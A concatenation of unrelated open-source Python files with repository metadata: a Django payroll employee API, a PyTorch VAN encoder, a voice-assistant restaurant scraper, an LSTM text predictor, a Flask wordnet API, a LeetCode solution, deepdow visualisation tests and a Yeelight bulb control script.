| Q(position__icontains=search) \n | Q(address_present__icontains=search) \n | Q(address_permanent__icontains=search) \n | Q(place_of_birth__icontains=search) \n | Q(tin__icontains=search) \n | Q(gsis__icontains=search) \n | Q(philhealth__icontains=search) \n | Q(pagibig__icontains=search) \n | Q(sss__icontains=search) \n | Q(station_link__name__icontains=search),\n Q.AND\n )\n if is_active:\n filter_conditions.add(Q(is_active = is_active), Q.AND)\n if station:\n filter_conditions.add(Q(station = station), Q.AND)\n if sex:\n filter_conditions.add(Q(sex = sex), Q.AND)\n if civil_status:\n filter_conditions.add(Q(civil_status = civil_status), Q.AND)\n if application_status:\n 
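# the 'as' query parameter filters employees by application status\n 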
filter_conditions.add(Q(application_status = application_status), Q.AND)\n if level:\n filter_conditions.add(Q(level = level), Q.AND)\n if firstday_gov_from and firstday_gov_to:\n filter_conditions.add(Q(firstday_gov__range = (firstday_gov_from, firstday_gov_to)), Q.AND)\n if firstday_sra_from and firstday_sra_to:\n filter_conditions.add(Q(firstday_sra__range = (firstday_sra_from, firstday_sra_to)), Q.AND)\n if first_appointment_from and first_appointment_to:\n filter_conditions.add(Q(first_appointment__range = (first_appointment_from, first_appointment_to)), Q.AND)\n if last_appointment_from and last_appointment_to:\n filter_conditions.add(Q(last_appointment__range = (last_appointment_from, last_appointment_to)), Q.AND)\n if last_step_increment_from and last_step_increment_to:\n filter_conditions.add(Q(last_step_increment__range = (last_step_increment_from, last_step_increment_to)), Q.AND)\n if last_adjustment_from and last_adjustment_to:\n filter_conditions.add(Q(last_adjustment__range = (last_adjustment_from, last_adjustment_to)), Q.AND)\n if last_promotion_from and last_promotion_to:\n filter_conditions.add(Q(last_promotion__range = (last_promotion_from, last_promotion_to)), Q.AND)\n \n page = self.paginate_queryset(self.queryset.filter(filter_conditions).order_by(self.__sort_field()))\n serializer = self.get_serializer(page, many=True)\n return self.get_paginated_response(serializer.data)\n\n\n def __sort_field(self):\n field = '-updated_at'\n sort_field = self.request.GET.get('sort_field', None)\n sort_order = self.request.GET.get('sort_order', None)\n available_sort_fields = Employee().SORTABLE_FIELDS\n if sort_field:\n if sort_field in available_sort_fields:\n if sort_order == \"desc\":\n field = \"-\"+sort_field\n else:\n field = sort_field\n return field\n\n\n def create(self, request):\n serializer = EmployeeCreateFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = Employee()\n # Personal Details\n employee.firstname = serializer.data['firstname'].upper()\n employee.middlename = serializer.data['middlename'].upper()\n employee.lastname = serializer.data['lastname'].upper()\n employee.suffixname = serializer.data['suffixname']\n employee.set_fullname(\n serializer.data['lastname'], \n serializer.data['firstname'], \n serializer.data['middlename'], \n serializer.data['suffixname']\n )\n employee.address_present = serializer.data['address_present']\n employee.address_permanent = serializer.data['address_permanent']\n employee.birthdate = serializer.data['birthdate']\n employee.place_of_birth = serializer.data['place_of_birth']\n employee.sex = serializer.data['sex']\n employee.civil_status = serializer.data['civil_status']\n employee.tel_no = serializer.data['tel_no']\n employee.cell_no = serializer.data['cell_no']\n employee.email_address = serializer.data['email_address']\n employee.spouse_name = serializer.data['spouse_name']\n employee.spouse_occupation = serializer.data['spouse_occupation']\n employee.no_of_children = serializer.data['no_of_children']\n employee.height = serializer.data['height']\n employee.weight = serializer.data['weight']\n employee.religion = serializer.data['religion']\n employee.blood_type = serializer.data['blood_type']\n # Appointment Details\n employee.employee_id = serializer.data['employee_id'] \n employee.position = serializer.data['position'].upper()\n employee.is_active = serializer.data['is_active']\n employee.salary_grade = serializer.data['salary_grade']\n employee.step_increment = 
serializer.data['step_increment']\n employee.application_status = serializer.data['application_status']\n employee.tax_status = serializer.data['tax_status']\n employee.monthly_salary = serializer.data['monthly_salary']\n employee.set_level(serializer.data['salary_grade'])\n employee.firstday_gov = serializer.data['firstday_gov']\n employee.firstday_sra = serializer.data['firstday_sra']\n employee.first_appointment = serializer.data['first_appointment']\n employee.last_appointment = serializer.data['last_appointment']\n employee.last_step_increment = serializer.data['last_step_increment']\n employee.last_adjustment = serializer.data['last_adjustment']\n employee.last_promotion = serializer.data['last_promotion']\n employee.original_appointment = serializer.data['original_appointment']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.tin = serializer.data['tin']\n employee.gsis = serializer.data['gsis']\n employee.philhealth = serializer.data['philhealth']\n employee.pagibig = serializer.data['pagibig']\n employee.sss = serializer.data['sss']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({\"id\":employee.id}, 201)\n except:\n return Response({}, 500)\n\n\n\n def retrieve(self, request, pk=None):\n employee = get_object_or_404(self.queryset, id=pk)\n serializer = EmployeeDetailsSerializer(employee)\n return Response(serializer.data, 200)\n\n\n def partial_update(self, request, pk=None):\n # Personal Details\n if request.data['form_type'] == \"PD\":\n serializer = EmployeeUpdatePersonalDetailsFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.firstname = serializer.data['firstname'].upper()\n employee.middlename = serializer.data['middlename'].upper()\n employee.lastname = serializer.data['lastname'].upper()\n employee.suffixname = serializer.data['suffixname']\n employee.set_fullname(\n serializer.data['lastname'], \n serializer.data['firstname'], \n serializer.data['middlename'], \n serializer.data['suffixname']\n )\n employee.address_present = serializer.data['address_present']\n employee.address_permanent = serializer.data['address_permanent']\n employee.birthdate = serializer.data['birthdate']\n employee.place_of_birth = serializer.data['place_of_birth']\n employee.sex = serializer.data['sex']\n employee.civil_status = serializer.data['civil_status']\n employee.tel_no = serializer.data['tel_no']\n employee.cell_no = serializer.data['cell_no']\n employee.email_address = serializer.data['email_address']\n employee.spouse_name = serializer.data['spouse_name']\n employee.spouse_occupation = serializer.data['spouse_occupation']\n employee.no_of_children = serializer.data['no_of_children']\n employee.height = serializer.data['height']\n employee.weight = serializer.data['weight']\n employee.religion = serializer.data['religion']\n employee.blood_type = serializer.data['blood_type']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({}, 201)\n except:\n return Response({}, 500)\n # Appointment Details\n elif request.data['form_type'] == \"AD\":\n serializer = EmployeeUpdateAppointmentDetailsFormSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.employee_id = 
serializer.data['employee_id']\n employee.position = serializer.data['position'].upper()\n employee.is_active = serializer.data['is_active']\n employee.salary_grade = serializer.data['salary_grade']\n employee.step_increment = serializer.data['step_increment']\n employee.application_status = serializer.data['application_status']\n employee.tax_status = serializer.data['tax_status']\n employee.monthly_salary = serializer.data['monthly_salary']\n employee.set_level(serializer.data['salary_grade'])\n employee.firstday_gov = serializer.data['firstday_gov']\n employee.firstday_sra = serializer.data['firstday_sra']\n employee.first_appointment = serializer.data['first_appointment']\n employee.last_appointment = serializer.data['last_appointment']\n employee.last_step_increment = serializer.data['last_step_increment']\n employee.last_adjustment = serializer.data['last_adjustment']\n employee.last_promotion = serializer.data['last_promotion']\n employee.original_appointment = serializer.data['original_appointment']\n employee.adjustment_date = serializer.data['adjustment_date']\n employee.tin = serializer.data['tin']\n employee.gsis = serializer.data['gsis']\n employee.philhealth = serializer.data['philhealth']\n employee.pagibig = serializer.data['pagibig']\n employee.sss = serializer.data['sss']\n employee.created_by_id = request.user.id\n employee.updated_by_id = request.user.id\n employee.save()\n return Response({}, 201)\n except Exception:\n return Response({}, 500)\n else:\n return Response({\"form_type\": \"Invalid Form Type!\"}, 400)\n\n\n def destroy(self, request, pk=None):\n try:\n employee = get_object_or_404(self.queryset, id=pk)\n employee.delete()\n return Response({}, 200)\n except Exception:\n return Response({}, 500)\n\n\n @action(methods=['delete'], detail=False)\n def bulk_destroy(self, request):\n serializer = EmployeeBulkDeleteSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n ids = serializer.data['ids']\n try:\n for data in ids:\n employee = get_object_or_404(self.queryset, id=data)\n employee.delete()\n return Response({}, 200)\n except Exception:\n return Response({}, 500)\n\n\n @action(methods=['get'], detail=False)\n def get_all(self, request):\n employee_queryset = Employee.objects.all()\n serializer = self.get_serializer(employee_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass EmployeeEducationalBackgroundViewSet(viewsets.ModelViewSet):\n queryset = EmployeeEducationalBackground.objects.all()\n serializer_class = EmployeeEducationalBackgroundSerializer\n\n def create(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(Employee.objects, id=serializer.data['employee'])\n employee_educ_bg = EmployeeEducationalBackground()\n employee_educ_bg.employee = employee\n employee_educ_bg.level = serializer.data['level']\n employee_educ_bg.school = serializer.data['school']\n employee_educ_bg.course = serializer.data['course']\n employee_educ_bg.date_from = serializer.data['date_from']\n employee_educ_bg.date_to = serializer.data['date_to']\n employee_educ_bg.units = serializer.data['units']\n employee_educ_bg.graduate_year = serializer.data['graduate_year']\n employee_educ_bg.scholarship = serializer.data['scholarship']\n employee_educ_bg.honor = serializer.data['honor']\n employee_educ_bg.save()\n return Response({}, 201)\n except Exception:\n return Response({}, 500)\n\n\n def retrieve(self, request, 
pk=None):\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(employee_educ_bg)\n return Response(serializer.data, 200)\n\n\n def update(self, request, pk=None):\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee_educ_bg.level = serializer.data['level']\n employee_educ_bg.school = serializer.data['school']\n employee_educ_bg.course = serializer.data['course']\n employee_educ_bg.date_from = serializer.data['date_from']\n employee_educ_bg.date_to = serializer.data['date_to']\n employee_educ_bg.units = serializer.data['units']\n employee_educ_bg.graduate_year = serializer.data['graduate_year']\n employee_educ_bg.scholarship = serializer.data['scholarship']\n employee_educ_bg.honor = serializer.data['honor']\n employee_educ_bg.save()\n return Response({}, 201)\n except Exception:\n return Response({}, 500)\n\n\n def destroy(self, request, pk=None):\n try:\n employee_educ_bg = get_object_or_404(self.queryset, id=pk)\n employee_educ_bg.delete()\n return Response({}, 200)\n except Exception:\n return Response({}, 500)\n\n\n\nclass EmployeeEligibilityViewSet(viewsets.ModelViewSet):\n queryset = EmployeeEligibility.objects.all()\n serializer_class = EmployeeEligibilitySerializer\n\n def create(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee = get_object_or_404(Employee.objects, id=serializer.data['employee'])\n employee_elig = EmployeeEligibility()\n employee_elig.employee = employee\n employee_elig.eligibility = serializer.data['eligibility']\n employee_elig.level = serializer.data['level']\n employee_elig.rating = serializer.data['rating']\n employee_elig.exam_place = serializer.data['exam_place']\n employee_elig.exam_date = serializer.data['exam_date']\n employee_elig.license_no = serializer.data['license_no']\n employee_elig.license_validity = serializer.data['license_validity']\n employee_elig.save()\n return Response({}, 201)\n except Exception:\n return Response({}, 500)\n\n\n def retrieve(self, request, pk=None):\n employee_elig = get_object_or_404(self.queryset, id=pk)\n serializer = self.get_serializer(employee_elig)\n return Response(serializer.data, 200)\n\n\n def update(self, request, pk=None):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n try:\n employee_elig = get_object_or_404(self.queryset, id=pk)\n employee_elig.eligibility = serializer.data['eligibility']\n employee_elig.level = serializer.data['level']\n employee_elig.rating = serializer.data['rating']\n employee_elig.exam_place = serializer.data['exam_place']\n employee_elig.exam_date = serializer.data['exam_date']\n employee_elig.license_no = serializer.data['license_no']\n employee_elig.license_validity = serializer.data['license_validity']\n employee_elig.save()\n return Response({}, 201)\n except Exception:\n return Response({}, 500)\n\n\n def destroy(self, request, pk=None):\n try:\n employee_elig = get_object_or_404(self.queryset, id=pk)\n employee_elig.delete()\n return Response({}, 200)\n except Exception:\n return Response({}, 500)\n\n\n\n\n\n\n\n\n\n\n\n \n","repo_name":"devbertram/django_government_payroll","sub_path":"employee/api/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":21068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25981169608","text":"# ~*~ encoding: 
utf-8 ~*~\n\nfrom django.utils.translation import ugettext_lazy as _\n\naction_messages = {\n \"page_created\": _(\"Page created successfully\"),\n \"page_updated\": _(\"Page updated successfully\"),\n \"page_reverted\": _(\"Page reverted to revision %s\"),\n}\n\n","repo_name":"altunyurt/djiggy","sub_path":"main/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43599203402","text":"from __future__ import absolute_import, division, print_function\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torch.utils.model_zoo as model_zoo\nfrom .van import *\nfrom timm.models import create_model\nfrom .van import OverlapPatchEmbed\n\n\nclass ResNetMultiImageInput(models.ResNet):\n \"\"\"Constructs a resnet model with varying number of input images.\n Adapted from https://github.com/pytorch/vision/blob/master/torchvision/models/resnet.py\n \"\"\"\n def __init__(self, block, layers, num_classes=1000, num_input_images=1):\n super(ResNetMultiImageInput, self).__init__(block, layers)\n self.inplanes = 64\n self.conv1 = nn.Conv2d(\n num_input_images * 3, 64, kernel_size=7, stride=2, padding=3, bias=False)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n\ndef van_multiimage_input(num_layers, pretrained=False, num_input_images=1):\n \"\"\"Constructs a multi-image-input ResNet model.\n Args:\n num_layers (int): Number of resnet layers. 
Must be 18 or 50\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n num_input_images (int): Number of frames stacked as input\n \"\"\"\n assert num_layers in [18, 50], \"Can only run with 18 or 50 layer resnet\"\n blocks = {18: [2, 2, 2, 2], 50: [3, 4, 6, 3]}[num_layers]\n block_type = {18: models.resnet.BasicBlock, 50: models.resnet.Bottleneck}[num_layers]\n model = ResNetMultiImageInput(block_type, blocks, num_input_images=num_input_images)\n\n if pretrained:\n loaded = model_zoo.load_url(models.resnet.model_urls['resnet{}'.format(num_layers)])\n loaded['conv1.weight'] = torch.cat(\n [loaded['conv1.weight']] * num_input_images, 1) / num_input_images\n model.load_state_dict(loaded)\n return model\n\n\nclass VANEncoder(nn.Module):\n \"\"\"Pytorch module for a VAN encoder\n \"\"\"\n def __init__(self, size_encoder, pretrained, num_input_images=1):\n super(VANEncoder, self).__init__()\n\n van_paths = {\"tiny\": \"./pretrained/van_tiny_754.pth.tar\",\n #van_paths = {\"tiny\": \"./pretrained/van_tiny_seg.pth\",\n #\"small\": \"./pretrained/van_small_seg.pth\",\n \"small\": \"./pretrained/van_small_811.pth.tar\",\n \"base\": \"./pretrained/van_base_828.pth.tar\"\n }\n if size_encoder == 'tiny':\n self.num_ch_enc = np.array([32, 64, 160, 256])\n else:\n self.num_ch_enc = np.array([64, 128, 320, 512])\n\n if size_encoder not in van_paths:\n raise ValueError(\"{} is not a valid size of van\".format(size_encoder))\n\n if num_input_images > 1:\n #self.encoder = van_multiimage_input(num_layers, pretrained, num_input_images)\n self.encoder = create_model(\"van_{}\".format(size_encoder), pretrained=False, num_classes=None, drop_rate=0.0, drop_path_rate=0.1, drop_block_rate=None)\n\n self.encoder.patch_embed1 = OverlapPatchEmbed(in_chans=3*num_input_images, embed_dim=self.num_ch_enc[0])\n if pretrained:\n pretrained_state_dict = torch.load(van_paths[size_encoder])['state_dict']\n pretrained_state_dict['patch_embed1.proj.weight'] = torch.cat(\n [pretrained_state_dict['patch_embed1.proj.weight']] * num_input_images, 1) / num_input_images\n self.encoder.load_state_dict(pretrained_state_dict)\n else:\n self.encoder = create_model(\"van_{}\".format(size_encoder), pretrained=False, num_classes=None, drop_rate=0.0, drop_path_rate=0.1, drop_block_rate=None)\n\n if pretrained:\n encoder_dict = self.encoder.state_dict()\n pretrained_state_dict = torch.load(van_paths[size_encoder])['state_dict']\n load_state_dict = {k: v for k, v in pretrained_state_dict.items() if k in encoder_dict.keys()}\n encoder_dict.update(load_state_dict)\n self.encoder.load_state_dict(encoder_dict)\n\n\n\n def forward(self, input_image):\n self.features = []\n x = (input_image - 0.45) / 0.225\n\n B = x.shape[0]\n\n for i in range(4):\n patch_embed = getattr(self.encoder, f\"patch_embed{i + 1}\")\n block = getattr(self.encoder, f\"block{i + 1}\")\n norm = getattr(self.encoder, f\"norm{i + 1}\")\n x, H, W = patch_embed(x)\n for blk in block:\n #x = blk(x, H, W)\n x = blk(x)\n x = x.flatten(2).transpose(1, 2)\n x = norm(x)\n x = x.reshape(B, H, W, -1).permute(0, 3, 1, 2).contiguous()\n #if i != 3:\n #x = x.reshape(B, H, W, -1).permute(0, 3, 1, 2).contiguous()\n\n self.features.append(x)\n\n #print(x.shape)\n\n\n return self.features\n","repo_name":"xjixzz/vadepth-net","sub_path":"networks/van_encoder.py","file_name":"van_encoder.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24327806743","text":"from 
speachModule import speak\nfrom takecommandModule import takeCommand\nimport random\nfrom bs4 import BeautifulSoup\nimport requests\nimport geocoder\n\nflag = 1\n\ng = geocoder.ip('me')\n\ndef rec_restaurant():\n try:\n speak(\"do you want recommendations for your current location\")\n a = takeCommand(flag).lower()\n if \"yes\" in a:\n city = g.city.lower()\n else:\n speak(\"give me a city name\")\n city = takeCommand(flag).lower()\n\n speak(\"what kind of dish or food you like\")\n dish = takeCommand(flag).lower()\n speak(\"sure....let me find something for you\")\n print(dish, city)\n url = 'https://www.zomato.com/'+city+'/restaurants/'+dish+'?category=0'\n header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36'}\n\n response = requests.get(url, headers=header)\n html = response.text\n\n soup = BeautifulSoup(html, 'lxml')\n\n top_rest = soup.find('div', class_=\"orig-search-list-container\")\n restaurant = []\n rating = []\n\n rsts = top_rest.find_all('a', class_=\"result-title\")\n rate = top_rest.find_all('span', class_=\"rating-value\")\n for i in rate:\n x = i.text.replace(\"\\n\", \" \").strip()\n rating.append(x)\n for i in rsts:\n x = i.text.replace(\"\\n\", \" \").strip()\n restaurant.append(x)\n speak(\"Here are some places that you should try\")\n for i in range(0, 5):\n print(restaurant[i]+\" rating \"+rating[i])\n speak(restaurant[i]+\" rating \"+rating[i])\n r = random.randrange(0, 5, 1)\n\n speak(\"but i think you should try \"+restaurant[r]+\" they have a good rating of \"+rating[r])\n except Exception:\n speak(\"sorry something went wrong....please try again\")","repo_name":"shnkreddy98/Python-Voice-Assistant","sub_path":"restaurantModule.py","file_name":"restaurantModule.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2526833554","text":"# predicting text from .h5 trained model\n\nimport numpy as np\nimport LSTM_text_gen_v2 as trained_model\n\n#load saved weights\ntrained_model.model.load_weights(\"mary_shelly_text_Gen.h5\")\nstring_mapped = trained_model.X[99]\nfull_string = [trained_model.n_to_char[value] for value in string_mapped]\n\nfor i in range(400):\n x = np.reshape(string_mapped, (1, len(string_mapped), 1))\n x = x / float(len(trained_model.characters))\n\n pred_index = np.argmax(trained_model.model.predict(x, verbose=0))\n seq = [trained_model.n_to_char[value] for value in string_mapped]\n full_string.append(trained_model.n_to_char[pred_index])\n\n string_mapped.append(pred_index)\n string_mapped = string_mapped[1:len(string_mapped)]\n\ntxt = \"\"\nfor char in full_string:\n txt = txt + char\n\nprint(txt)","repo_name":"tonserrobo/AI_text_gen","sub_path":"LSTM_text_Gen_v2_prediction.py","file_name":"LSTM_text_Gen_v2_prediction.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21148423044","text":"class Solution:\n def twoCitySchedCost(self, costs: List[List[int]]) -> int:\n costs.sort(key=lambda cost: -abs(cost[0] - cost[1]))\n\n ret = 0\n assigned = [0, 0]\n\n for cost in costs:\n argmin = self.argmin(cost)\n\n if assigned[argmin] < len(costs) // 2:\n assigned[argmin] += 1\n ret += cost[argmin]\n else:\n assigned[1 - argmin] += 1\n ret += cost[1 - argmin]\n\n return ret\n\n def argmin(self, cost: List[int]) -> int:\n if cost[0] < cost[1]:\n return 0\n\n return 
1\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/1029. Two City Scheduling/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"25795026892","text":"import os\nfrom app import app\nfrom wordnet import *\nfrom flask import jsonify, request\nimport json\nfrom .auth import requires_auth\n\n\nword_net = retrieve_net(\n os.path.dirname(os.path.dirname(os.path.abspath(__file__)))+'/data/network_sample.wrnt'\n )\n\n\nresource = {\n 1:{\n 'name':'Anurag',\n 'age':22\n },\n 2:{\n 'name': 'tushar',\n 'age': 17\n }\n}\n\n@app.route('/')\ndef home():\n return 'Hello There.'\n\n'''\nExample views: only experimental\n'''\n@app.route('/index/<id>')\ndef homeindex(id):\n return 'index'+str(id)\n\n@app.route('/api/<int:i>')\n@requires_auth\ndef api(i):\n if i not in resource : return not_found()\n resp = jsonify(resource[i])\n resp.status_code = 200\n return resp\n\n'''\nmain views start here onwards.\n'''\n@app.route('/api/net/<root>')\ndef get_words(root):\n output = {\n 'words': return_net(root, word_net, depth=1)\n }\n\n resp = jsonify(output)\n resp.status_code = 200\n return resp\n\n'''\nError Handlers\n'''\n@app.errorhandler(404)\ndef not_found(error=None):\n message = {\n 'status': 404,\n 'message': 'Not Found: ' + request.url,\n }\n resp = jsonify(message)\n resp.status_code = 404\n\n return resp\n\n","repo_name":"anuragkumarak95/wordnet-webapp","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23664226722","text":"import datetime\nfrom unittest.mock import MagicMock, Mock\n\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.axes import Axes\nfrom matplotlib.colors import ListedColormap\nimport numpy as np\nimport pandas as pd\nimport pytest\n\nfrom deepdow.losses import MeanReturns\nfrom deepdow.visualize import (\n plot_weight_anim,\n plot_weight_heatmap,\n generate_cumrets,\n generate_metrics_table,\n generate_weights_table,\n plot_metrics,\n)\n\n\nclass TestGenerateCumrets:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_cumrets({\"bm_1\": \"WRONG\"}, dataloader_dummy)\n\n with pytest.raises(TypeError):\n generate_cumrets({\"bm_1\": network_dummy}, \"FAKE\")\n\n def test_basic(self, dataloader_dummy, network_dummy):\n cumrets_dict = generate_cumrets(\n {\"bm_1\": network_dummy}, dataloader_dummy\n )\n\n assert isinstance(cumrets_dict, dict)\n assert len(cumrets_dict) == 1\n assert \"bm_1\" in cumrets_dict\n assert cumrets_dict[\"bm_1\"].shape == (\n len(dataloader_dummy.dataset),\n dataloader_dummy.horizon,\n )\n\n\nclass TestGenerateMetricsTable:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": \"WRONG\"}, dataloader_dummy, {\"metric\": MeanReturns()}\n )\n\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": network_dummy}, \"FAKE\", {\"metric\": MeanReturns()}\n )\n\n with pytest.raises(TypeError):\n generate_metrics_table(\n {\"bm_1\": network_dummy}, dataloader_dummy, {\"metric\": \"FAKE\"}\n )\n\n def test_basic(self, dataloader_dummy, network_dummy):\n metrics_table = generate_metrics_table(\n {\"bm_1\": network_dummy}, dataloader_dummy, {\"rets\": MeanReturns()}\n )\n\n assert isinstance(metrics_table, pd.DataFrame)\n 
assert len(metrics_table) == len(dataloader_dummy.dataset)\n assert {\"metric\", \"value\", \"benchmark\", \"timestamp\"} == set(\n metrics_table.columns.to_list()\n )\n\n\ndef test_plot_metrics(monkeypatch):\n n_entries = 100\n metrics_table = pd.DataFrame(\n np.random.random((n_entries, 2)), columns=[\"value\", \"timestamp\"]\n )\n metrics_table[\"metric\"] = \"M\"\n metrics_table[\"benchmark\"] = \"B\"\n\n fake_plt = Mock()\n fake_plt.subplots.return_value = None, MagicMock()\n fake_pd = Mock()\n\n monkeypatch.setattr(\"deepdow.visualize.plt\", fake_plt)\n monkeypatch.setattr(\"deepdow.visualize.pd\", fake_pd)\n\n plot_metrics(metrics_table)\n\n\nclass TestGenerateWeightsTable:\n def test_errors(self, dataloader_dummy, network_dummy):\n with pytest.raises(TypeError):\n generate_weights_table(\"FAKE\", dataloader_dummy)\n\n with pytest.raises(TypeError):\n generate_weights_table(network_dummy, \"FAKE\")\n\n def test_basic(self, dataloader_dummy, network_dummy):\n weights_table = generate_weights_table(network_dummy, dataloader_dummy)\n\n assert isinstance(weights_table, pd.DataFrame)\n assert len(weights_table) == len(dataloader_dummy.dataset)\n assert set(weights_table.index.to_list()) == set(\n dataloader_dummy.dataset.timestamps\n )\n assert (\n weights_table.columns.to_list()\n == dataloader_dummy.dataset.asset_names\n )\n\n\nclass TestPlotWeightAnim:\n def test_errors(self):\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]], columns=[\"others\", \"asset_1\"])\n )\n\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]]), n_displayed_assets=3\n )\n\n with pytest.raises(ValueError):\n plot_weight_anim(\n pd.DataFrame([[0, 1], [1, 2]], columns=[\"a\", \"b\"]),\n n_displayed_assets=1,\n always_visible=[\"a\", \"b\"],\n )\n\n @pytest.mark.parametrize(\n \"colors\",\n [None, {\"asset_1\": \"green\"}, ListedColormap([\"green\", \"red\"])],\n )\n def test_portfolio_evolution(self, monkeypatch, colors):\n n_timesteps = 4\n n_assets = 3\n n_displayed_assets = 2\n\n weights = pd.DataFrame(\n np.random.random((n_timesteps, n_assets)),\n index=pd.date_range(start=\"1/1/2000\", periods=n_timesteps),\n columns=[\"asset_{}\".format(i) for i in range(n_assets)],\n )\n\n weights[\n \"asset_0\"\n ] = 0 # the smallest but we will force its display anyway\n\n fake_functanim = Mock()\n fake_functanim.return_value = Mock(spec=FuncAnimation)\n\n monkeypatch.setattr(\"deepdow.visualize.FuncAnimation\", fake_functanim)\n plt_mock = Mock()\n plt_mock.subplots = Mock(return_value=[Mock(), Mock()])\n\n monkeypatch.setattr(\"deepdow.visualize.plt\", plt_mock)\n ani = plot_weight_anim(\n weights,\n n_displayed_assets=n_displayed_assets,\n always_visible=[\"asset_0\"],\n n_seconds=10,\n figsize=(1, 1),\n colors=colors,\n )\n\n assert isinstance(ani, FuncAnimation)\n\n\nclass TestPlotWeightHeatmap:\n @pytest.mark.parametrize(\"add_sum_column\", [True, False])\n @pytest.mark.parametrize(\"time_format\", [None, \"%d-%m-%Y\"])\n def test_basic(self, time_format, add_sum_column, monkeypatch):\n n_timesteps = 20\n n_assets = 10\n index = (\n list(range(n_timesteps))\n if time_format is None\n else pd.date_range(\"1/1/2000\", periods=n_timesteps)\n )\n\n weights = pd.DataFrame(\n np.random.random(size=(n_timesteps, n_assets)), index=index\n )\n\n fake_axes = Mock(spec=Axes)\n fake_axes.xaxis = Mock()\n\n fake_sns = Mock()\n fake_sns.heatmap.return_value = fake_axes\n\n monkeypatch.setattr(\"deepdow.visualize.sns\", fake_sns)\n ax = plot_weight_heatmap(\n 
weights, time_format=time_format, add_sum_column=add_sum_column\n )\n\n assert isinstance(ax, Axes)\n assert fake_sns.heatmap.call_count == 1\n assert fake_axes.tick_params.call_count == 2\n\n def test_sum_column(self):\n with pytest.raises(ValueError):\n now = datetime.datetime.now()\n df = pd.DataFrame(\n np.zeros((2, 2)), columns=[\"asset\", \"sum\"], index=[now, now]\n )\n plot_weight_heatmap(df, add_sum_column=True)\n","repo_name":"jankrepl/deepdow","sub_path":"tests/test_visualize.py","file_name":"test_visualize.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":764,"dataset":"github-code","pt":"37"} +{"seq_id":"30595135461","text":"import time\nimport sys\n\nimport yeelight\n\n\ndef light_control(addr):\n bulb = yeelight.Bulb(addr)\n\n bulb.turn_on()\n bulb.set_rgb(0, 128, 255)\n print('Start lighting...')\n time.sleep(10)\n\n for i in range(0, 256, 15):\n bulb.set_rgb(i, 128 - (int)(i / 5), 255 - i)\n print('R:%d G:%d B:%d' % (i, 128-i/5, 255 - i))\n time.sleep(1)\n\n time.sleep(10)\n bulb.turn_off()\n print('Stop lighting')\n return ()\n\n\nif __name__ == '__main__':\n args = sys.argv\n if 2 <= len(args):\n light_control(args[1])\n else:\n print('Arguments are too 